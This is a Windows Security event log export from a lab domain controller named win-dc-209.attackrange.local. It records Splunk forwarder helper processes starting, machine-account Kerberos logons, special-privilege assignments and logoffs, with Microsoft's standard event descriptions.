Logon ID: 0x0
Process Information:
New Process ID: 0x19c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:13:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263580
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:13:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263579
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x161c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:13:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263581
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1034
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:13:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263582
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x169c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:13:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263584
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x760
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:13:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263583
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14cc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:13:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263587
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72B848
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:13:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263586
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x72B848
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59865
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:13:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263585
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72B848
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263598
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BC84
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263597
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BD72
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263596
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BDBA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263595
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x72BE2C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59870
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263594
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BE2C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263593
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x72BDBA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 59869
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263592
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BDBA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263591
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x72BD72
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263590
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BD72
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263589
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x72BC84
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59868
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263588
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BC84
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:14:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263599
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x53c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:14:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263601
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x186c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:14:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263600
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:14:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263602
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ab0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
